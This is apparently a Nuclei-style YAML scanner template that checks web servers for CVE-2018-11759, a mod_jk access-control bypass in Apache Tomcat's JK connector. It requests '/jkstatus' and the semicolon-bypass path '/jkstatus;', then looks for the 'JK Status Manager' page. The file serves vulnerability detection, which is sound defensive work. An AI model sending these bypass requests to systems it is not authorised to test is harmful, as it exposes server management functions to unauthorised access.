39 lines
1.4 KiB
YAML
39 lines
1.4 KiB
YAML
id: CVE-2018-11759
|
|
|
|
info:
|
|
name: Apache Tomcat JK Connect <=1.2.44 - Manager Access
|
|
author: harshbothra_
|
|
severity: high
|
|
description: |
|
|
Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.
|
|
reference:
|
|
- https://github.com/immunIT/CVE-2018-11759
|
|
- https://lists.apache.org/thread.html/6d564bb0ab73d6b3efdd1d6b1c075d1a2c84ecd84a4159d6122529ad@%3Cannounce.tomcat.apache.org%3E
|
|
- http://web.archive.org/web/20210518152646/https://www.securityfocus.com/bid/105888
|
|
- https://lists.debian.org/debian-lts-announce/2018/12/msg00007.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-11759
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-11759
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2018,apache,tomcat
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/jkstatus'
|
|
- '{{BaseURL}}/jkstatus;'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: word
|
|
words:
|
|
- "JK Status Manager"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# Enhanced by mp on 2022/06/19
|